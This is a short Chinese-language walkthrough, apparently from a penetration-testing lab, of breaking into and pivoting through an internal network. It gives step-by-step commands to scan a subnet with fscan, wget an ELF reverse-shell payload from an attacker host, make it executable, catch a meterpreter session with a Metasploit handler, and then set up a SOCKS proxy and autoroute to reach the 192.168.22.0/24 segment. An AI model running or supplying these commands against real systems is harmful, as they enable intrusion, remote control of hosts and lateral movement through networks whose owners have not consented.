目录
路由配置连接sessions,记住在sessions里面进行路由配置转发出来
生成一个elf病毒,然后通过蚁剑进行wget远程传输,前面文章有提到各种文件传输方式
信息收集阶段
fscan收集
对这个网段进行信息扫描
chmod u+x fscan #给个权限
./fscan -h 192.168.22.0/24 开始收集
收集成功
上线阶段
wget http://192.168.20.128:8000/10000_reverse.elf
成功上传病毒文件
给病毒文件添加可执行权限
chmod u+x 10000_reverse.elf
进入msfconsole开启监听
handler -p linux/x64/meterpreter_reverse_tcp -H 192.168.20.128 -P 10000
运行后门elf等上线
成功上线我们攻击机
流量转发代理阶段
SOCKS端口代理,主要是转发出来代理的流量
search socks
配置参数,socks版本4a比较稳定
set srvport 20000 #修改端口
set version 4a #修改版本
run成功开启代理监听
路由配置连接sessions,记住在sessions里面进行路由配置转发出来
sessions
sessions 1 #进入上线主机
run autoroute -s 192.168.22.0/24 #搞个路由转发,连通我们的公网
run autoroute -p #可以看到我们的sessions 1已经成功链接这个网段